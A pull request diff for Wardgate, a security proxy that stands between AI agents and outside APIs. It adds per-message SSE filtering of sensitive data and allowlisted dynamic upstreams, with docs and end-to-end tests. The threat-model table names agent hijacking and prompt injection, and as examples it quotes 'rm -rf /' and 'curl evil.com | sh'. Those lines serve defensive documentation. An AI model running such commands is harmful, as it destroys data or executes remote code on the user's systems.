### PR TITLE
feat: Add SSE stream filtering and dynamic upstream support

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -7,6 +7,7 @@ grants.json
 /wardgate
 /wardgate-cli
 /wardgate-exec
+/wardgate-proxy
 /config/
 
 CLAUDE.md

--- a/.gitignore
+++ b/.gitignore
@@ -9,6 +9,8 @@ grants.json
 /wardgate-exec
 /config/
 
+CLAUDE.md
+
 # Zensical
 /site/
 .venv

--- a/README.md
+++ b/README.md
@@ -60,7 +60,8 @@ flowchart LR
 - **Access Control** -- Define what each agent can do: read-only calendar, no email deletion, ask before sending
 - **Presets** -- Pre-configured settings for popular APIs (Todoist, GitHub, Cloudflare, Google Calendar, Postmark, Sentry, IMAP, SMTP, and more)
 - **Protocol Adapters** -- HTTP/REST passthrough, SSH, IMAP and SMTP with REST wrappers
-- **Sensitive Data Filtering** -- Automatically block or redact OTP codes, verification links, and API keys in responses
+- **Sensitive Data Filtering** -- Automatically block or redact OTP codes, verification links, and API keys in responses, including SSE streams (per-message filtering for LLM APIs)
+- **Dynamic Upstreams** -- Agents select targets per-request from a validated allowlist of glob patterns (e.g., `https://*.googleapis.com`)
 
 ### Conclaves (Remote Execution)
 

--- a/cmd/wardgate/main.go
+++ b/cmd/wardgate/main.go
@@ -19,6 +19,7 @@ import (
 	"github.com/wardgate/wardgate/internal/config"
 	"github.com/wardgate/wardgate/internal/discovery"
 	execpkg "github.com/wardgate/wardgate/internal/exec"
+	"github.com/wardgate/wardgate/internal/filter"
 	"github.com/wardgate/wardgate/internal/grants"
 	"github.com/wardgate/wardgate/internal/hub"
 	"github.com/wardgate/wardgate/internal/imap"
@@ -291,8 +292,24 @@ func main() {
 				}
 				p.SetAllowedSealHeaders(allowedHeaders)
 			}
+			// Wire filter for HTTP endpoints
+			if f, err := buildEndpointFilter(cfg, endpoint); err != nil {
+				log.Fatalf("Failed to build filter for endpoint %s: %v", name, err)
+			} else if f != nil {
+				p.SetFilter(f)
+			}
+			// Wire endpoint timeout
+			if endpoint.Timeout != "" {
+				if d, err := time.ParseDuration(endpoint.Timeout); err == nil {
+					p.SetTimeout(d)
+				}
+			}
 			h = auditMiddleware(auditLog, name, p)
-			log.Printf("Registered HTTP endpoint: /%s/ -> %s", name, endpoint.Upstream)
+			target := endpoint.Upstream
+			if target == "" {
+				target = fmt.Sprintf("dynamic(%d patterns)", len(endpoint.AllowedUpstreams))
+			}
+			log.Printf("Registered HTTP endpoint: /%s/ -> %s", name, target)
 		}
 
 		// Wrap with agent scope middleware if endpoint has agents restriction
@@ -307,11 +324,13 @@ func main() {
 	endpointInfos := make([]discovery.EndpointInfo, 0, len(cfg.Endpoints))
 	for name, endpoint := range cfg.Endpoints {
 		endpointInfos = append(endpointInfos, discovery.EndpointInfo{
-			Name:        name,
-			Description: cfg.GetEndpointDescription(name, endpoint),
-			Upstream:    endpoint.Upstream,
-			DocsURL:     endpoint.DocsURL,
-			Agents:      endpoint.Agents,
+			Name:             name,
+			Description:      cfg.GetEndpointDescription(name, endpoint),
+			Upstream:         endpoint.Upstream,
+			AllowedUpstreams: endpoint.AllowedUpstreams,
+			Dynamic:          len(endpoint.AllowedUpstreams) > 0,
+			DocsURL:          endpoint.DocsURL,
+			Agents:           endpoint.Agents,
 		})
 	}
 
@@ -403,6 +422,8 @@ func agentScopeMiddleware(agents []string, next http.Handler) http.Handler {
 func auditMiddleware(logger *audit.Logger, endpoint string, next http.Handler) http.Handler {
 	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
 		start := time.Now()
+		// Capture dynamic upstream header before proxy strips it
+		upstream := r.Header.Get("X-Wardgate-Upstream")
 		rw := &responseWriter{ResponseWriter: w, status: http.StatusOK}
 
 		next.ServeHTTP(rw, r)
@@ -412,6 +433,7 @@ func auditMiddleware(logger *audit.Logger, endpoint string, next http.Handler) h
 			Endpoint:       endpoint,
 			Method:         r.Method,
 			Path:           r.URL.Path,
+			Upstream:       upstream,
 			SourceIP:       r.RemoteAddr,
 			AgentID:        r.Header.Get("X-Agent-ID"),
 			Decision:       decisionFromStatus(rw.status),
@@ -439,6 +461,13 @@ func (rw *responseWriter) Write(b []byte) (int, error) {
 	return n, err
 }
 
+// Flush implements http.Flusher, required for SSE streaming through the audit middleware.
+func (rw *responseWriter) Flush() {
+	if f, ok := rw.ResponseWriter.(http.Flusher); ok {
+		f.Flush()
+	}
+}
+
 func decisionFromStatus(status int) string {
 	switch {
 	case status == http.StatusForbidden:
@@ -450,6 +479,38 @@ func decisionFromStatus(status int) string {
 	default:
 		return "error"
 	}
+}
+
+// buildEndpointFilter creates a filter for an HTTP endpoint, merging filter_defaults with endpoint-specific settings.
+// Returns nil if no filter config is present.
+func buildEndpointFilter(cfg *config.Config, ep config.Endpoint) (*filter.Filter, error) {
+	fc := ep.Filter
+	if fc == nil {
+		fc = cfg.FilterDefaults
+	}
+	if fc == nil {
+		return nil, nil
+	}
+
+	enabled := true
+	if fc.Enabled != nil {
+		enabled = *fc.Enabled
+	}
+
+	filterCfg := filter.Config{
+		Enabled:     enabled,
+		Patterns:    fc.Patterns,
+		Action:      filter.ParseAction(fc.Action),
+		Replacement: fc.Replacement,
+		SSEMode:     fc.SSEMode,
+	}
+	for _, cp := range fc.CustomPatterns {
+		filterCfg.CustomPatterns = append(filterCfg.CustomPatterns, filter.CustomPattern{
+			Name:    cp.Name,
+			Pattern: cp.Pattern,
+		})
+	}
+	return filter.New(filterCfg)
 }
 
 // parseIMAPUpstream parses IMAP connection config from endpoint settings.

--- a/config.yaml.example
+++ b/config.yaml.example
@@ -283,6 +283,47 @@ endpoints:
   #       action: deny
 
   # ---------------------------------------------------------------------------
+  # DYNAMIC UPSTREAMS (agent chooses target per-request)
+  # ---------------------------------------------------------------------------
+  # The agent sets X-Wardgate-Upstream header; Wardgate validates against the
+  # allowed_upstreams glob patterns. Useful for multi-host APIs (e.g., Google).
+  # See docs/config.md#dynamic-upstreams for details.
+
+  # google-apis:
+  #   allowed_upstreams:
+  #     - "https://*.googleapis.com"
+  #   auth:
+  #     type: bearer
+  #     credential_env: WARDGATE_CRED_GOOGLE
+  #   rules:
+  #     - match: { method: GET }
+  #       action: allow
+  #     - match: { method: "*" }
+  #       action: deny
+
+  # ---------------------------------------------------------------------------
+  # LLM API with SSE streaming filter
+  # ---------------------------------------------------------------------------
+  # SSE streams (text/event-stream) are filtered per-message in real time.
+  # Set sse_mode: passthrough to skip filtering on trusted SSE endpoints.
+
+  # openai:
+  #   upstream: https://api.openai.com/v1
+  #   auth:
+  #     type: bearer
+  #     credential_env: WARDGATE_CRED_OPENAI
+  #   filter:
+  #     enabled: true
+  #     patterns: [api_keys]
+  #     action: redact
+  #     sse_mode: filter  # "filter" (default) or "passthrough"
+  #   rules:
+  #     - match: { method: POST, path: "/chat/completions" }
+  #       action: allow
+  #     - match: { method: "*" }
+  #       action: deny
+
+  # ---------------------------------------------------------------------------
   # IMAP (email reading) - using preset
   # ---------------------------------------------------------------------------
 

--- a/docs/architecture.md
+++ b/docs/architecture.md
@@ -23,7 +23,9 @@ Wardgate is a security proxy that sits between AI agents and external services. 
 | Prompt injection attacks | Agent can only perform allowed actions |
 | Rogue agent behavior | All requests logged and rate-limited |
 | Data exfiltration | Policies restrict what data can be accessed |
+| Sensitive data in responses | Response filtering blocks or redacts OTP codes, API keys, etc. -- including SSE streams |
 | Accidental destructive actions | Require approval for sensitive operations or block them |
+| SSRF via dynamic upstreams | Agent-provided upstream URLs validated against allowlist with scheme, host, and path checks |
 | Tool call hijacking (e.g., `rm -rf /`, `curl evil.com \| sh`) | Conclaves isolate execution and evaluate each command against policy |
 
 ### What We Don't Protect Against
@@ -52,6 +54,8 @@ Multiple layers protect your credentials:
 │  • Validates agent identity                     │
 │  • Evaluates policy rules                       │
 │  • Rate limits requests                         │
+│  • Validates dynamic upstream targets           │
+│  • Filters sensitive data from responses/SSE    │
 │  • Logs everything                              │
 └────────────────────┬────────────────────────────┘
                      │ Wardgate injects real credentials
@@ -69,6 +73,8 @@ Agents only get access to what they need:
 - Restrict methods (GET only, no DELETE)
 - Limit paths (only `/tasks`, not `/admin`)
 - Time-bound access (business hours only)
+- Dynamic upstreams limited to allowlisted host patterns
+- Response filtering removes sensitive data before it reaches the agent
 
 ### 3. Explicit Over Implicit
 
@@ -117,13 +123,27 @@ Credentials never leave the gateway:
    │ ──► Under limit, proceed                    │
    └─────────────────────────────────────────────┘
 
-5. Inject credentials and forward
+5. Resolve upstream target
+   ┌─────────────────────────────────────────────┐
+   │ Static upstream from config?       ──► Yes  │
+   │ Or: X-Wardgate-Upstream header?             │
+   │   Validate against allowed_upstreams globs  │
+   └─────────────────────────────────────────────┘
+
+6. Inject credentials and forward
    ┌─────────────────────────────────────────────┐
    │ GET https://api.todoist.com/rest/v2/tasks   │
    │ Authorization: Bearer <real-api-key>        │
    └─────────────────────────────────────────────┘
 
-6. Log and return response
+7. Filter response and return
+   ┌─────────────────────────────────────────────┐
+   │ Scan for sensitive data (OTPs, API keys)    │
+   │ SSE streams: filter per-message in realtime │
+   │ Action: block, redact, or pass through      │
+   └─────────────────────────────────────────────┘
+
+8. Log
    ┌─────────────────────────────────────────────┐
    │ Log: agent=myagent endpoint=todoist-api     │
    │       method=GET path=/tasks decision=allow │

--- a/docs/config.md
+++ b/docs/config.md
@@ -397,14 +397,20 @@ Map of endpoint names to their configuration.
 | Field | Type | Required | Description |
 |-------|------|----------|-------------|
 | `adapter` | string | No | Adapter type: `http` (default), `imap`, `smtp`, or `ssh` |
+| `preset` | string | No | Preset name to use as base configuration (see [Presets](presets.md)) |
+| `description` | string | No | Human-readable description (shown in discovery API) |
 | `agents` | array | No | Agent IDs allowed to access this endpoint (empty = all agents) |
-| `upstream` | string | Yes | URL of the upstream service |
+| `upstream` | string | Yes* | URL of the upstream service |
+| `allowed_upstreams` | array | No | Glob patterns for dynamic upstream targets (see [Dynamic Upstreams](#dynamic-upstreams)) |
 | `docs_url` | string | No | Link to API documentation (exposed in discovery, overrides preset) |
 | `auth` | object | Yes | Authentication configuration |
 | `rules` | array | No | Policy rules (default: deny all) |
+| `filter` | object | No | Sensitive data filtering (see [Sensitive Data Filtering](#sensitive-data-filtering)) |
 | `imap` | object | No | IMAP-specific settings (for `adapter: imap`) |
 | `smtp` | object | No | SMTP-specific settings (for `adapter: smtp`) |
 | `ssh` | object | No | SSH-specific settings (for `adapter: ssh`) |
+
+\* Either `upstream` or `allowed_upstreams` is required for HTTP endpoints.
 
 ```yaml
 endpoints:
@@ -1187,6 +1193,62 @@ Host key verification is required by default. You must provide one of:
 - `known_hosts_file`: path to a known_hosts file
 - `insecure_skip_verify: true`: disable verification (logs a warning, not recommended for production)
 
+## Dynamic Upstreams
+
+By default, each endpoint has a fixed `upstream` URL. Dynamic upstreams allow agents to choose the target URL per-request using the `X-Wardgate-Upstream` header, validated against an allowlist of glob patterns.
+
+This is useful for endpoints that proxy to multiple services sharing the same credentials (e.g., different Google API hosts).
+
+### Configuration
+
+```yaml
+endpoints:
+  google-apis:
+    # No static upstream needed (but can be set as fallback)
+    allowed_upstreams:
+      - "https://*.googleapis.com"
+      - "https://api.example.com/v1"
+    auth:
+      type: bearer
+      credential_env: WARDGATE_CRED_GOOGLE
+    rules:
+      - match: { method: GET }
+        action: allow
+```
+
+### Usage
+
+Agents set the target per-request:
+
+```
+GET /google-apis/storage/v1/b/my-bucket
+X-Wardgate-Upstream: https://storage.googleapis.com
+Authorization: Bearer <agent-key>
+```
+
+### Pattern Syntax
+
+Patterns use glob-style matching with scheme enforcement:
+
+| Pattern | Matches | Does Not Match |
+|---------|---------|----------------|
+| `https://api.example.com` | `https://api.example.com/any/path` | `http://api.example.com` (scheme mismatch) |
+| `https://*.googleapis.com` | `https://storage.googleapis.com` | `https://googleapis.com` (no subdomain) |
+| `https://api.example.com/v1` | `https://api.example.com/v1/users` | `https://api.example.com/v1-admin` (path segment boundary) |
+
+Hostname matching is case-insensitive. Path matching enforces segment boundaries (`/v1` matches `/v1/foo` but not `/v1-admin`).
+
+### Security
+
+- URLs with userinfo (`http://user@host`), query parameters, or fragments are rejected
+- Only `http://` and `https://` schemes are allowed
+- The `X-Wardgate-Upstream` header is stripped before forwarding to the upstream
+- Policy rules are evaluated before upstream resolution
+
+### Fallback
+
+If both `upstream` and `allowed_upstreams` are set, the static upstream is used when no `X-Wardgate-Upstream` header is present. If only `allowed_upstreams` is set, the header is required.
+
 ## Sensitive Data Filtering
 
 Wardgate can automatically detect and filter sensitive data in API responses and email messages. This prevents agents from seeing OTP codes, verification links, API keys, and other security-sensitive information.
@@ -1247,6 +1309,181 @@ filter_defaults:
 | `custom_patterns` | array | | User-defined regex patterns |
 | `action` | string | `block` | Action when detected: `block`, `redact`, `ask`, `log` |
 | `replacement` | string | `[SENSITIVE DATA REDACTED]` | Replacement text for `redact` action |
+| `sse_mode` | string | `filter` | SSE stream handling: `filter` or `passthrough` (see [SSE Streaming](#sse-streaming)) |
+
+### SSE Streaming
+
+When an upstream returns `Content-Type: text/event-stream` (Server-Sent Events), Wardgate filters each SSE message individually as it streams through, rather than buffering the entire response. This allows real-time filtering of LLM streaming responses.
+
+**Behavior by mode:**
+
+| Mode | Description |
+|------|-------------|
+| `filter` (default) | Each SSE message is scanned. `redact` replaces sensitive data inline. `block` terminates the stream with an error event. |
+| `passthrough` | SSE messages are forwarded without scanning (useful for trusted endpoints). |
+
+**How it works:**
+
+- SSE metadata lines (`id:`, `event:`, `retry:`) pass through unchanged
+- Only `data:` fields are scanned for sensitive content
+- The `[DONE]` sentinel (used by OpenAI-compatible APIs) always passes through
+- On `block`, an `event: error` is emitted and the stream terminates:
+  ```
+  event: error
+  data: {"error":"response blocked"}
+  ```
+- Error messages are generic and do not reveal which filter patterns matched (to prevent bypass crafting)
+- SSE lines are limited to 1MB to protect against oversized payloads
+
+**Example:**
+
+```yaml
+endpoints:
+  llm-api:
+    upstream: https://api.openai.com/v1
+    auth:
+      type: bearer
+      credential_env: OPENAI_KEY
+    filter:
+      enabled: true
+      patterns: [api_keys]
+      action: redact
+      sse_mode: filter  # Default - filter SSE streams per-message
+```
+
+### How to Add an SSE Endpoint (OpenAI Example)
+
+This walkthrough shows how to configure Wardgate as a streaming proxy for OpenAI's chat completions API, combining [Dynamic Upstreams](#dynamic-upstreams) with SSE filtering. The same approach works for any OpenAI-compatible API (Anthropic, Groq, local models, etc.).
+
+#### 1. Wardgate Configuration
+
+Create a `config.yaml` with a dynamic upstream endpoint:
+
+```yaml
+server:
+  listen: ":4065"
+
+agents:
+  - id: my-agent
+    key_env: WARDGATE_AGENT_KEY
+
+endpoints:
+  openai:
+    description: "OpenAI API (dynamic upstream)"
+    allowed_upstreams:
+      - "https://api.openai.com"
+    timeout: "5m"
+    auth:
+      type: bearer
+      credential_env: OPENAI_API_KEY
+    filter:
+      enabled: true
+      patterns:
+        - api_keys
+      action: redact
+      sse_mode: filter
+    rules:
+      - match:
+          method: POST
+        action: allow
+      - match:
+          method: "*"
+        action: deny
+        message: "Only POST allowed"
+```
+
+Key points:
+
+- **`allowed_upstreams`** instead of a static `upstream` -- the agent specifies the target via the `X-Wardgate-Upstream` header. This is useful when you want one endpoint definition to cover multiple path prefixes (e.g., `/v1`, `/v2`).
+- **`timeout: "5m"`** -- streaming responses can take a while; set a generous timeout.
+- **`sse_mode: filter`** -- Wardgate scans each SSE chunk for sensitive data as it streams through, rather than buffering the full response.
+- **`patterns: [api_keys]`** -- prevents the LLM from leaking API keys in its output (e.g., if it echoes a key from training data).
+
+#### 2. Environment Variables
+
+Add the credentials to your `.env` file:
+
+```bash
+OPENAI_API_KEY=sk-proj-...
+WARDGATE_AGENT_KEY=my-agent-secret-key
+```
+
+The agent authenticates to Wardgate with `WARDGATE_AGENT_KEY`. Wardgate injects `OPENAI_API_KEY` into the upstream request. The agent never sees the real OpenAI key.
+
+#### 3. Client Usage
+
+The agent sends requests to Wardgate instead of directly to OpenAI, using the agent key for auth and `X-Wardgate-Upstream` to specify the target:
+
+```
+POST /openai/chat/completions
+Host: localhost:4065
+Authorization: Bearer my-agent-secret-key
+X-Wardgate-Upstream: https://api.openai.com/v1
+Content-Type: application/json
+
+{"model": "gpt-4o-mini", "stream": true, "messages": [{"role": "user", "content": "Hello"}]}
+```
+
+Wardgate will:
+1. Authenticate the agent via the `Authorization` header
+2. Validate `X-Wardgate-Upstream` against `allowed_upstreams`
+3. Evaluate the request against `rules` (POST is allowed)
+4. Replace the agent's Bearer token with the real `OPENAI_API_KEY`
+5. Forward the request to `https://api.openai.com/v1/chat/completions`
+6. Stream the SSE response back, filtering each chunk for sensitive data
+
+#### 4. Example: Vercel AI SDK Client
+
+Here is a TypeScript client using the [Vercel AI SDK](https://sdk.vercel.ai/) that streams a chat completion through Wardgate:
+
+```typescript
+import { createOpenAI } from "@ai-sdk/openai";
+import { streamText } from "ai";
+
+const openai = createOpenAI({
+  baseURL: "http://localhost:4065/openai",
+  apiKey: "my-agent-secret-key",
+  headers: {
+    "X-Wardgate-Upstream": "https://api.openai.com/v1",
+  },
+});
+
+const result = streamText({
+  model: openai("gpt-4o-mini"),
+  prompt: "Write a haiku about secure API gateways.",
+});
+
+for await (const chunk of result.textStream) {
+  process.stdout.write(chunk);
+}
+```
+
+The AI SDK sends the `apiKey` as `Authorization: Bearer ...`, which Wardgate uses for agent authentication. The `X-Wardgate-Upstream` header tells Wardgate where to forward the request.
+
+#### 5. Using a Static Upstream Instead
+
+If you only need to proxy to a single OpenAI base URL, you can use a static `upstream` instead of `allowed_upstreams`:
+
+```yaml
+endpoints:
+  openai:
+    upstream: https://api.openai.com/v1
+    auth:
+      type: bearer
+      credential_env: OPENAI_API_KEY
+    filter:
+      enabled: true
+      patterns: [api_keys]
+      action: redact
+      sse_mode: filter
+    rules:
+      - match: { method: POST }
+        action: allow
+      - match: { method: "*" }
+        action: deny
+```
+
+With a static upstream, the agent does not need to send the `X-Wardgate-Upstream` header.
 
 ### Built-in Patterns
 
@@ -1291,7 +1528,7 @@ endpoints:
 
 | Adapter | Filter Applies To | Default Action |
 |---------|------------------|----------------|
-| HTTP | Response bodies (JSON, text, XML) | `block` |
+| HTTP | Response bodies (JSON, text, XML) and SSE streams (per-message) | `block` |
 | IMAP | Message subject and body | `block` |
 | SMTP | Outgoing email subject/body (triggers `ask`) | `ask` |
 | SSH | Command stdout/stderr | `block` |

--- a/docs/config.md
+++ b/docs/config.md
@@ -1230,10 +1230,14 @@ Authorization: Bearer <agent-key>
 
 Patterns use glob-style matching with scheme enforcement:
 
+- `*` matches exactly **one** hostname segment (between dots)
+- `**` matches **one or more** hostname segments (across dots)
+
 | Pattern | Matches | Does Not Match |
 |---------|---------|----------------|
 | `https://api.example.com` | `https://api.example.com/any/path` | `http://api.example.com` (scheme mismatch) |
-| `https://*.googleapis.com` | `https://storage.googleapis.com` | `https://googleapis.com` (no subdomain) |
+| `https://*.googleapis.com` | `https://storage.googleapis.com` | `https://googleapis.com` (no subdomain), `https://evil.com.googleapis.com` (`*` is single segment) |
+| `https://**.googleapis.com` | `https://storage.googleapis.com`, `https://intended.com.googleapis.com` | `https://googleapis.com` (`**` requires at least one segment) |
 | `https://api.example.com/v1` | `https://api.example.com/v1/users` | `https://api.example.com/v1-admin` (path segment boundary) |
 
 Hostname matching is case-insensitive. Path matching enforces segment boundaries (`/v1` matches `/v1/foo` but not `/v1-admin`).

--- a/e2e/sse_test.go
+++ b/e2e/sse_test.go
@@ -1,0 +1,629 @@
+package e2e
+
+import (
+	"bufio"
+	"io"
+	"net/http"
+	"net/http/httptest"
+	"strings"
+	"testing"
+
+	"github.com/wardgate/wardgate/internal/auth"
+	"github.com/wardgate/wardgate/internal/config"
+	"github.com/wardgate/wardgate/internal/filter"
+	"github.com/wardgate/wardgate/internal/policy"
+	"github.com/wardgate/wardgate/internal/proxy"
+)
+
+// TestSSE_E2E exercises the full SSE streaming path through the gateway stack:
+//
+//	agent (bearer auth) → agent auth middleware → policy engine → proxy (filter) → upstream SSE
+//
+// This covers all SSE filter modes: redact, block, passthrough, and verifies
+// that sensitive data never leaks to the agent.
+func TestSSE_E2E(t *testing.T) {
+	agentKey := "test-sse-agent-key-" + randomHexKey(t, 8)
+	agentKeyEnv := "TEST_SSE_AGENT_KEY"
+	credEnv := "TEST_SSE_CRED"
+
+	t.Setenv(agentKeyEnv, agentKey)
+	t.Setenv(credEnv, "upstream-secret")
+
+	agents := []config.AgentConfig{
+		{ID: "sse-agent", KeyEnv: agentKeyEnv},
+	}
+
+	allowAll := []config.Rule{
+		{Match: config.Match{Method: "*"}, Action: "allow"},
+	}
+
+	t.Run("redact: sensitive data replaced in SSE stream", func(t *testing.T) {
+		// Upstream sends SSE with an API key in one of the messages
+		upstream := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+			w.Header().Set("Content-Type", "text/event-stream")
+			w.Header().Set("Cache-Control", "no-cache")
+			w.WriteHeader(http.StatusOK)
+			// Message 1: clean
+			w.Write([]byte("data: {\"text\": \"hello\"}\n\n"))
+			// Message 2: contains API key
+			w.Write([]byte("data: {\"key\": \"sk-1234567890abcdef1234567890abcdef\"}\n\n"))
+			// Message 3: clean sentinel
+			w.Write([]byte("data: [DONE]\n\n"))
+		}))
+		defer upstream.Close()
+
+		f := newSSEFilter(t, filter.ActionRedact, "filter")
+		gw := buildSSEGateway(t, "sse-redact", upstream.URL, agents, allowAll, credEnv, f)
+		defer gw.Close()
+
+		resp := doSSERequest(t, gw, agentKey, "/sse-redact/stream")
+		defer resp.Body.Close()
+
+		if resp.StatusCode != http.StatusOK {
+			body, _ := io.ReadAll(resp.Body)
+			t.Fatalf("expected 200, got %d: %s", resp.StatusCode, body)
+		}
+
+		events := readSSEEvents(t, resp.Body)
+
+		// Should have 3 events
+		if len(events) < 3 {
+			t.Fatalf("expected at least 3 SSE events, got %d: %v", len(events), events)
+		}
+
+		// First event: clean, passes through
+		if !strings.Contains(events[0], "hello") {
+			t.Errorf("first event should contain 'hello', got: %s", events[0])
+		}
+
+		// Second event: API key should be redacted
+		if strings.Contains(events[1], "sk-1234567890abcdef1234567890abcdef") {
+			t.Error("API key leaked through redaction filter to agent")
+		}
+		if !strings.Contains(events[1], "[REDACTED]") {
+			t.Error("expected redaction marker in second event")
+		}
+
+		// Third event: [DONE] sentinel passes through
+		if !strings.Contains(events[2], "[DONE]") {
+			t.Errorf("expected [DONE] sentinel, got: %s", events[2])
+		}
+	})
+
+	t.Run("block: stream terminated on sensitive data", func(t *testing.T) {
+		upstream := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+			w.Header().Set("Content-Type", "text/event-stream")
+			w.WriteHeader(http.StatusOK)
+			// Message 1: clean
+			w.Write([]byte("data: {\"text\": \"hello\"}\n\n"))
+			// Message 2: contains API key → should trigger block
+			w.Write([]byte("data: {\"key\": \"sk-1234567890abcdef1234567890abcdef\"}\n\n"))
+			// Message 3: should never reach agent
+			w.Write([]byte("data: {\"text\": \"after block\"}\n\n"))
+		}))
+		defer upstream.Close()
+
+		f := newSSEFilter(t, filter.ActionBlock, "filter")
+		gw := buildSSEGateway(t, "sse-block", upstream.URL, agents, allowAll, credEnv, f)
+		defer gw.Close()
+
+		resp := doSSERequest(t, gw, agentKey, "/sse-block/stream")
+		defer resp.Body.Close()
+
+		body, _ := io.ReadAll(resp.Body)
+		bodyStr := string(body)
+
+		// First clean event should pass through
+		if !strings.Contains(bodyStr, "hello") {
+			t.Error("expected first clean event to pass through")
+		}
+
+		// Should contain error event
+		if !strings.Contains(bodyStr, "event: error") {
+			t.Error("expected error event when stream is blocked")
+		}
+		if !strings.Contains(bodyStr, "response blocked") {
+			t.Error("expected 'response blocked' in error event")
+		}
+
+		// Error event must NOT leak filter pattern names
+		if strings.Contains(bodyStr, "api_keys") {
+			t.Error("error event leaks filter pattern name 'api_keys' to agent")
+		}
+
+		// Content after block should not reach agent
+		if strings.Contains(bodyStr, "after block") {
+			t.Error("content after block event should not reach agent")
+		}
+	})
+
+	t.Run("block error does not leak pattern names", func(t *testing.T) {
+		upstream := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+			w.Header().Set("Content-Type", "text/event-stream")
+			w.WriteHeader(http.StatusOK)
+			w.Write([]byte("data: {\"key\": \"sk-1234567890abcdef1234567890abcdef\"}\n\n"))
+		}))
+		defer upstream.Close()
+
+		f := newSSEFilter(t, filter.ActionBlock, "filter")
+		gw := buildSSEGateway(t, "sse-noleak", upstream.URL, agents, allowAll, credEnv, f)
+		defer gw.Close()
+
+		resp := doSSERequest(t, gw, agentKey, "/sse-noleak/stream")
+		defer resp.Body.Close()
+
+		body, _ := io.ReadAll(resp.Body)
+		bodyStr := string(body)
+
+		// Must not contain any filter pattern name hints
+		for _, forbidden := range []string{"api_keys", "otp_codes", "verification_links", "sensitive data detected"} {
+			if strings.Contains(bodyStr, forbidden) {
+				t.Errorf("error event leaks filter metadata %q to agent", forbidden)
+			}
+		}
+
+		// Must contain the generic error
+		if !strings.Contains(bodyStr, `"error":"response blocked"`) {
+			t.Errorf("expected generic error message, got: %s", bodyStr)
+		}
+	})
+
+	t.Run("passthrough mode: no filtering on SSE", func(t *testing.T) {
+		sseData := "data: {\"key\": \"sk-1234567890abcdef1234567890abcdef\"}\n\ndata: [DONE]\n\n"
+		upstream := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+			w.Header().Set("Content-Type", "text/event-stream")
+			w.WriteHeader(http.StatusOK)
+			w.Write([]byte(sseData))
+		}))
+		defer upstream.Close()
+
+		f := newSSEFilter(t, filter.ActionBlock, "passthrough")
+		gw := buildSSEGateway(t, "sse-pass", upstream.URL, agents, allowAll, credEnv, f)
+		defer gw.Close()
+
+		resp := doSSERequest(t, gw, agentKey, "/sse-pass/stream")
+		defer resp.Body.Close()
+
+		if resp.StatusCode != http.StatusOK {
+			t.Fatalf("expected 200, got %d", resp.StatusCode)
+		}
+
+		body, _ := io.ReadAll(resp.Body)
+		if string(body) != sseData {
+			t.Errorf("passthrough mode should not alter SSE data\ngot:  %q\nwant: %q", string(body), sseData)
+		}
+	})
+
+	t.Run("non-SSE response still blocked by filter", func(t *testing.T) {
+		// Verify that enabling SSE filtering doesn't break non-SSE filter behavior
+		upstream := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+			w.Header().Set("Content-Type", "application/json")
+			w.Write([]byte(`{"key": "sk-1234567890abcdef1234567890abcdef"}`))
+		}))
+		defer upstream.Close()
+
+		f := newSSEFilter(t, filter.ActionBlock, "filter")
+		gw := buildSSEGateway(t, "sse-nonjson", upstream.URL, agents, allowAll, credEnv, f)
+		defer gw.Close()
+
+		resp := doSSERequest(t, gw, agentKey, "/sse-nonjson/data")
+		defer resp.Body.Close()
+
+		if resp.StatusCode != http.StatusForbidden {
+			t.Errorf("expected 403 for blocked non-SSE response, got %d", resp.StatusCode)
+		}
+
+		body, _ := io.ReadAll(resp.Body)
+		bodyStr := string(body)
+
+		// Non-SSE block should also use generic message (no pattern leak)
+		if strings.Contains(bodyStr, "api_keys") {
+			t.Error("non-SSE block error leaks filter pattern name to agent")
+		}
+	})
+
+	t.Run("policy deny still works for SSE endpoints", func(t *testing.T) {
+		upstream := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+			t.Error("upstream should not be reached when policy denies")
+		}))
+		defer upstream.Close()
+
+		denyDelete := []config.Rule{
+			{Match: config.Match{Method: "GET"}, Action: "allow"},
+			{Match: config.Match{Method: "*"}, Action: "deny", Message: "read only"},
+		}
+
+		f := newSSEFilter(t, filter.ActionRedact, "filter")
+		gw := buildSSEGateway(t, "sse-deny", upstream.URL, agents, denyDelete, credEnv, f)
+		defer gw.Close()
+
+		req, _ := http.NewRequest("POST", gw.URL+"/sse-deny/stream", nil)
+		req.Header.Set("Authorization", "Bearer "+agentKey)
+		resp, err := gw.Client().Do(req)
+		if err != nil {
+			t.Fatal(err)
+		}
+		defer resp.Body.Close()
+
+		if resp.StatusCode != http.StatusForbidden {
+			t.Errorf("expected 403 for policy deny, got %d", resp.StatusCode)
+		}
+	})
+
+	t.Run("unauthenticated request to SSE endpoint returns 401", func(t *testing.T) {
+		upstream := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+			t.Error("upstream should not be reached without auth")
+		}))
+		defer upstream.Close()
+
+		f := newSSEFilter(t, filter.ActionRedact, "filter")
+		gw := buildSSEGateway(t, "sse-noauth", upstream.URL, agents, allowAll, credEnv, f)
+		defer gw.Close()
+
+		req, _ := http.NewRequest("GET", gw.URL+"/sse-noauth/stream", nil)
+		// No Authorization header
+		resp, err := gw.Client().Do(req)
+		if err != nil {
+			t.Fatal(err)
+		}
+		defer resp.Body.Close()
+
+		if resp.StatusCode != http.StatusUnauthorized {
+			t.Errorf("expected 401, got %d", resp.StatusCode)
+		}
+	})
+
+	t.Run("SSE metadata lines preserved through filter", func(t *testing.T) {
+		upstream := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+			w.Header().Set("Content-Type", "text/event-stream")
+			w.WriteHeader(http.StatusOK)
+			w.Write([]byte("id: msg-001\nevent: delta\nretry: 3000\ndata: {\"text\": \"hello\"}\n\n"))
+		}))
+		defer upstream.Close()
+
+		f := newSSEFilter(t, filter.ActionRedact, "filter")
+		gw := buildSSEGateway(t, "sse-meta", upstream.URL, agents, allowAll, credEnv, f)
+		defer gw.Close()
+
+		resp := doSSERequest(t, gw, agentKey, "/sse-meta/stream")
+		defer resp.Body.Close()
+
+		body, _ := io.ReadAll(resp.Body)
+		bodyStr := string(body)
+
